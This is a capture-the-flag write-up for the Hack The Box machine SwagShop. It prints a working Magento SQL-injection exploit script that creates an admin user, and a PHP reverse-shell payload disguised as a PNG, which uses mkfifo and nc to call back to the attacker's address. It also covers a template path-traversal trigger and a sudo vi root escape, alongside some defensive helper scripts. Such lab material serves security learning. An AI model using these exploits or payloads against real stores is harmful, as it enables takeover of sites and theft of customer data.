Hackthebox - SwagShop

Target Information

Target Type

Information Gathering

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 10000 10.10.10.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-17 02:26 CST
Warning: 10.10.10.140 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.140
Host is up (0.078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6552bd24e8fa3817261379a12f624ec (RSA)
|   256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_  256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/17%OT=22%CT=1%CU=30863%PV=Y%DS=2%DC=T%G=Y%TM=63EE758
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST1
OS:1NW7%O6=M537ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   117.05 ms 10.10.16.1
2   76.51 ms  10.10.10.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds

HTTP

HTTP on port 80 redirects to the hostname swagshop.htb, so add a hosts entry for it (as root):

echo 10.10.10.140 swagshop.htb >> /etc/hosts

It looks like an online store; the footer shows it is a 2014 release of Magento.

Search for known exploits:

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit magento      
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                                                                                                                     | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)                                                                                          | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting                                                                               | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting                                                                         | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                                                                                                                        | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                   | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution                                                                                                                     | php/webapps/37811.py
Magento eCommerce - Local File Disclosure                                                                                                                                        | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                        | xml/webapps/37977.py
Magento eCommerce CE v2.3.5-p2 - Blind SQLi                                                                                                                                      | php/webapps/50896.txt
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                           | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                      | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass                                                                                                     | php/webapps/48135.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is a "Remote Code Execution" entry (xml/webapps/37977.py). Reading the script shows what it really is: an unauthenticated SQL injection through the admin Cms_Wysiwyg directive endpoint. The stacked queries insert a new admin_user row with a password hash of our choosing and attach an admin role to it; the "code execution" is then whatever we do with the admin panel.

Exploitation

Copy it locally and take a look:

import requests
import base64
import sys

target = "http://target.com/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

The script after modification:

import requests
import base64
import sys

target = "http://swagshop.htb/index.php"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="lucifiel", password="lucifiel")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds lucifiel:lucifiel".format(target)
else:
    print "DID NOT WORK"

Adjust it to our needs: change the address on line 5 to http://swagshop.htb/index.php (Magento is served via index.php here, so the admin route is /index.php/admin/...), and change the username and password on line 24 to the ones we want. The script is Python 2 (print statements, base64.b64encode on a str), so run it with python2:

┌──(root㉿kali)-[~/Desktop]
└─# python2 exploit.py
WORKED
Check http://swagshop.htb/index.php/admin with creds lucifiel:lucifiel
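To see exactly what the two POST fields carry, here is an added helper (my own code, not part of the original exploit or of Magento). It decodes the ___directive value, rebuilds the injected filter string for any username/password pair, and reproduces the admin_user.password value that the injected SET @PASS computes (md5(salt + password) followed by ':' and the salt), so the credentials can be checked offline before logging in. All constants are copied from the script above; the function names are mine.

```python
import base64
import hashlib
import hmac

# The ___directive value posted by the exploit (copied from the script above).
DIRECTIVE_B64 = "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ"

# The stacked queries the exploit injects, newlines already stripped as the
# script does with q.replace("\n", ""). {username}/{password} are filled in later.
INJECTED_SQL = (
    "SET @SALT = 'rp';"
    "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));"
    "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
    "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,"
    "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`)"
    " VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
    "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name)"
    " VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');"
)


def decode_directive(b64):
    """Decode the unpadded base64 the script posts as ___directive."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode()


def build_filter(username, password):
    """Rebuild the plaintext 'filter' parameter.

    popularity[field_expr]=0) closes the expression the grid builds, and the
    ';' lets the rest ride in as additional statements.
    """
    sql = INJECTED_SQL.format(username=username, password=password)
    return "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);" + sql


def encode_filter(username, password):
    """The base64 form actually sent in the POST body."""
    return base64.b64encode(build_filter(username, password).encode()).decode()


def magento1_hash(password, salt="rp"):
    """What the injected SET @PASS stores: md5(salt + password) + ':' + salt."""
    return hashlib.md5((salt + password).encode()).hexdigest() + ":" + salt


def magento1_verify(password, stored):
    """Check a password against a stored 'digest:salt' value (constant-time compare)."""
    digest, sep, salt = stored.partition(":")
    if not sep:
        return False
    calc = hashlib.md5((salt + password).encode()).hexdigest()
    return hmac.compare_digest(calc, digest)


if __name__ == "__main__":
    print(decode_directive(DIRECTIVE_B64))
    print(build_filter("lucifiel", "lucifiel"))
    print(magento1_hash("lucifiel"))
```

Running it prints the decoded block directive, the plaintext filter with the stacked queries, and the hash value that ends up in admin_user.password for lucifiel:lucifiel.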

Then log in at the URL the script printed.

Login successful.

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

Digging around turned up this article on the relevant technique (Froghopper). It chains three admin-panel features: enable symlinks in the template settings, upload a PHP file with an image extension as a category image, then point a newsletter template block directive at that file via path traversal.

In the admin panel go to System -> Configuration -> Advanced -> Developer -> Template Settings -> Allow Symlinks.

Set it to Yes and click Save Config.

Next, create the image-disguised PHP shell: plain PHP in a file with a .png extension (10.10.16.7 is the attacker's address):

echo '<?php' > shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

Then go to Catalog -> Manage Categories and upload it as a category image.

Checking afterwards, our "image" has been uploaded; it lives under media/catalog/category/, which is the path used in the template directive below.

The last step is to create a newsletter template and inject our payload into it.

点击 Newsletter -> Newsletter Templates -> Add New Template

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

This is the content to put in the template body. The block directive loads our uploaded file as the template; with Allow Symlinks enabled, Magento no longer rejects a template path that resolves outside the design directories, which is what lets the traversal work.

Then start an nc listener on port 4444.

Finally click Preview Template; rendering the template executes our PHP:

┌──(root㉿kali)-[~/Desktop]
└─# rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.140] 33206
/bin/sh: 0: can't access tty; job control turned off
$ whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have a shell as www-data. Upgrade it to a proper TTY:

python3 -c "import pty;pty.spawn('/bin/bash')"
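For the defensive side of this chain, an added example (my own code, not from the Froghopper write-up or from Magento): it walks a media upload directory and flags files that carry an image extension but lack image magic bytes, contain a PHP open tag, or use a double extension such as shell.php.png. The demo() function builds a constructed directory in a temp folder with one benign PNG and one shell like the one uploaded above; the catalog/category/ layout mirrors the path used in the template directive.

```python
import os
import tempfile

# Extensions Magento accepts for category images; the payload hides behind one of them.
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif")

# Leading bytes a genuine file of each type must start with.
IMAGE_MAGIC = (
    b"\x89PNG\r\n\x1a\n",  # PNG
    b"\xff\xd8\xff",       # JPEG
    b"GIF87a",             # GIF
    b"GIF89a",             # GIF
)

# Anything that would make the PHP interpreter start executing the file.
PHP_MARKERS = (b"<?php", b"<?=", b'<script language="php"')


def inspect_file(path):
    """Return the list of findings for one file (empty list means it looks clean)."""
    findings = []
    with open(path, "rb") as fh:
        data = fh.read()
    if not any(data.startswith(magic) for magic in IMAGE_MAGIC):
        findings.append("no image magic bytes")
    if any(marker in data for marker in PHP_MARKERS):
        findings.append("contains PHP open tag")
    stem = os.path.basename(path).lower().rsplit(".", 1)[0]
    if ".php" in stem or ".phtml" in stem:  # e.g. shell.php.png
        findings.append("double extension")
    return findings


def scan_upload_dir(root):
    """Walk root and return {relative_path: findings} for suspicious image files."""
    suspicious = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(IMAGE_EXTS):
                continue
            full = os.path.join(dirpath, name)
            findings = inspect_file(full)
            if findings:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                suspicious[rel] = findings
    return suspicious


def demo():
    """Constructed sample tree: a real PNG header next to a PHP shell named shell.php.png."""
    root = tempfile.mkdtemp()
    category = os.path.join(root, "catalog", "category")
    os.makedirs(category)
    with open(os.path.join(category, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(category, "shell.php.png"), "wb") as fh:
        fh.write(b'<?php\npassthru("id");\n?>\n')
    return scan_upload_dir(root)


if __name__ == "__main__":
    for path, why in demo().items():
        print(path, "->", ", ".join(why))
```

Point scan_upload_dir at the real media/ tree to use it on a live install. Pair it with a check of the Allow Symlinks setting itself (the dev/template/allow_symlink row in core_config_data), since the upload alone is harmless until Magento is willing to render it as a template.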

Privilege Escalation

$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

We can run /usr/bin/vi as root, without a password, on any path matching /var/www/html/*.
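As an added triage helper (my own code, not from GTFOBins or from the box), this parses the output of sudo -l, extracts each rule's run-as user, NOPASSWD tag, binary and arguments, and flags binaries that GTFOBins lists as able to spawn a shell when run as root, noting when an argument is a wildcard as it is here. SAMPLE_SUDO_L is a copy of the output above; SHELL_ESCAPES is a small hand-picked subset, not the full GTFOBins list.

```python
import re
import shlex

# Constructed copy of the sudo -l output captured above.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
"""

# Hand-picked subset of binaries GTFOBins documents with a shell escape.
SHELL_ESCAPES = {"vi", "vim", "view", "nano", "less", "more", "man",
                 "awk", "find", "perl", "python", "python3"}

# "(runas) TAG: /path/bin args, /other/bin args"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return a list of rule dicts from 'sudo -l' output."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        # Rules start after the "User X may run the following commands" header.
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags")
        for cmd in m.group("cmds").split(", "):
            parts = shlex.split(cmd)
            if not parts:
                continue
            rules.append({
                "runas": m.group("runas").split(":")[0].strip(),  # "(root)" or "(ALL : ALL)"
                "nopasswd": "NOPASSWD:" in tags,
                "command": parts[0],
                "args": parts[1:],
            })
    return rules


def triage(rules):
    """Keep only root-capable rules whose binary is a known shell escape."""
    findings = []
    for rule in rules:
        if rule["runas"] not in ("root", "ALL"):
            continue
        binary = rule["command"].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append({
                **rule,
                "binary": binary,
                "wildcard": any("*" in a for a in rule["args"]),
            })
    return findings


if __name__ == "__main__":
    for hit in triage(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{hit['command']} {' '.join(hit['args'])} as {hit['runas']}"
              f" (nopasswd={hit['nopasswd']}, wildcard={hit['wildcard']})")
```

On a real host, feed it the captured output of sudo -l; a hit with wildcard=True, as here, means any file matching the pattern is enough to satisfy the rule.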

$ ls -la /var/www/html/
total 720
drwxr-xr-x 12 www-data www-data   4096 Nov 12  2021 .
drwxr-xr-x  3 root     root       4096 Nov 12  2021 ..
-rw-r--r--  1 www-data www-data   5667 May  7  2014 .htaccess
-rw-r--r--  1 www-data www-data   4568 May  7  2014 .htaccess.sample
-rw-r--r--  1 www-data www-data  10679 May  7  2014 LICENSE.html
-rw-r--r--  1 www-data www-data  10410 May  7  2014 LICENSE.txt
-rw-r--r--  1 www-data www-data  10421 May  7  2014 LICENSE_AFL.txt
-rw-r--r--  1 www-data www-data 585086 May  7  2014 RELEASE_NOTES.txt
-rw-r--r--  1 www-data www-data   2834 May  7  2014 api.php
drwxr-xr-x  6 www-data www-data   4096 Nov 12  2021 app
-rw-r--r--  1 www-data www-data   2831 May  7  2014 cron.php
-rw-r--r--  1 www-data www-data    717 May  7  2014 cron.sh
drwxr-xr-x  3 www-data www-data   4096 Nov 12  2021 errors
-rw-r--r--  1 www-data www-data   1150 May  7  2014 favicon.ico
-rw-r--r--  1 www-data www-data   5979 May  7  2014 get.php
drwxr-xr-x  2 www-data www-data   4096 Nov 12  2021 includes
-rw-r--r--  1 www-data www-data   2642 May  7  2014 index.php
-rw-r--r--  1 www-data www-data   2366 May  7  2014 index.php.sample
-rw-r--r--  1 www-data www-data   6441 May  7  2014 install.php
drwxr-xr-x 12 www-data www-data   4096 Nov 12  2021 js
drwxr-xr-x 13 www-data www-data   4096 Nov 12  2021 lib
-rw-r--r--  1 www-data www-data   1319 May  7  2014 mage
drwxrwxrwx  8 www-data www-data   4096 Nov 12  2021 media
-rw-r--r--  1 www-data www-data    886 May  7  2014 php.ini.sample
drwxr-xr-x  2 www-data www-data   4096 Nov 12  2021 pkginfo
drwxr-xr-x  2 www-data www-data   4096 Nov 12  2021 shell
drwxr-xr-x  5 www-data www-data   4096 Nov 12  2021 skin
drwxr-xr-x 10 www-data www-data   4096 Feb 16 13:54 var

There is quite a lot under /var/www/html/, so any of these files will satisfy the sudo rule.

https://gtfobins.github.io/gtfobins/vi/

Per GTFOBins, once inside vi we can type :shell to drop to a shell; since vi was started via sudo, that shell runs as root.

So open any matching file:

sudo /usr/bin/vi /var/www/html/index.php

Once it opens, press ESC, then type :shell.

root@swagshop:/var/www/html# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

Privilege escalation to root successful.

root@swagshop:/var/www/html# cat /home/haris/user.txt
cat /home/haris/user.txt
370cc7d01561ab4da02e53de7ef8d799

Got the user flag.

root@swagshop:/var/www/html# cat /root/root.txt
cat /root/root.txt
295e684ef53b47af9e6fc69a3301ee26

Got the root flag.